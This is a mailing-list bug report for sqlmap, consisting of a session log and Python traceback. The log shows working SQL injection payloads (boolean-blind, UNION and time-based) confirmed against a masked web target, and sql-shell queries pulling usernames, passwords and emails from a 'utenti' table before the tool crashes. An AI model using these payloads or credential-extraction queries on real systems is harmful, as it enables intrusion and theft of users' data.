[22:15:51] [INFO] resuming back-end DBMS 'mysql 5.0.11' from session file
[22:15:51] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s)
reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=12' AND 7690=7690 AND 'coUR'='coUR
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: id=12' UNION ALL SELECT NULL,
CONCAT(0x3a6e617a3a,0x61476a577a70535
36676,0x3a6f61623a)# AND 'vhgF'='vhgF
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=12' AND SLEEP(5) AND 'oxZQ'='oxZQ
---
[22:15:51] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0.11
[22:15:51] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press
ENTER
sql-shell> select nick, pws from utenti
[22:15:56] [INFO] fetching SQL SELECT statement query output: 'select nick,
pws
from utenti'
select nick, pws from utenti: 'None'
sql-shell> select nick, pws from utenti
[22:16:08] [INFO] fetching SQL SELECT statement query output: 'select nick,
pws
from utenti'
select nick, pws from utenti: 'None'
sql-shell> select nick, pws, mail from utenti
[22:16:32] [INFO] fetching SQL SELECT statement query output: 'select nick,
pws,
mail from utenti'
[22:16:32] [INFO] the SQL query provided has more than a field. sqlmap will
now
unpack it into distinct queries to be able to retrieve the output even if
we are
going blind
[22:16:32] [INFO] resumed: 4
the SQL query provided can return 4 entries. How many entries do you want
to ret
rieve?
[a] All (default)
[#] Specific number
[q] Quit
> a
[22:16:36] [INFO] retrieving the length of query output
[22:16:36] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your run
with
the latest development version from the Subversion repository. If the
exception
persists, please send by e-mail to sqlmap-users@lists.sourceforge.net the
follo
wing text and any information required to reproduce the bug. The developers
will
try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev
Python version: 2.7.2
Operating system: nt
Command line: P:\SQl INJECTION\sqlmap\sqlmap.py -u
*****************************
*********************** --sql-shell --threads=5
Technique: BOOLEAN
Back-end DBMS: MySQL (fingerprinted)
Traceback (most recent call last):
File "P:\SQl INJECTION\sqlmap\_sqlmap.py", line 82, in main
start()
File "P:\SQl INJECTION\sqlmap\lib\controller\controller.py", line 573, in
star
t
action()
File "P:\SQl INJECTION\sqlmap\lib\controller\action.py", line 121, in
action
conf.dbmsHandler.sqlShell()
File "P:\SQl INJECTION\sqlmap\plugins\generic\enumeration.py", line 2451,
in s
qlShell
output = self.sqlQuery(query)
File "P:\SQl INJECTION\sqlmap\plugins\generic\enumeration.py", line 2397,
in s
qlQuery
output = inject.getValue(query, fromUser=True)
File "P:\SQl INJECTION\sqlmap\lib\request\inject.py", line 439, in
getValue
value = __goInferenceProxy(query, fromUser, expected, batch, unpack,
charset
Type, firstChar, lastChar, dump)
File "P:\SQl INJECTION\sqlmap\lib\request\inject.py", line 306, in
__goInferen
ceProxy
output = __goInferenceFields(expression, expressionFields,
expressionFieldsL
ist, payload, expected, num, charsetType=charsetType, firstChar=firstChar,
lastC
har=lastChar, dump=dump)
File "P:\SQl INJECTION\sqlmap\lib\request\inject.py", line 115, in
__goInferen
ceFields
output = __goInference(payload, expressionReplaced, charsetType,
firstChar,
lastChar, dump)
File "P:\SQl INJECTION\sqlmap\lib\request\inject.py", line 70, in
__goInferenc
e
_, length, _ = queryOutputLength(expression, payload)
File "P:\SQl INJECTION\sqlmap\lib\utils\resume.py", line 74, in
queryOutputLen
gth
count, length = bisection(payload, lengthExprUnescaped, expected=
EXPECTED.IN
T, charsetType=CHARSET_TYPE.DIGITS)
TypeError: bisection() got an unexpected keyword argument 'expected'
[*] shutting down at 22:16:36
------------------------------------------------------------------------------
Better than sec? Nothing is better than sec when it comes to
monitoring Big Data applications. Try Boundary one-second
resolution app monitoring today. Free.
http://p.sf.net/sfu/Boundary-dev2dev
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
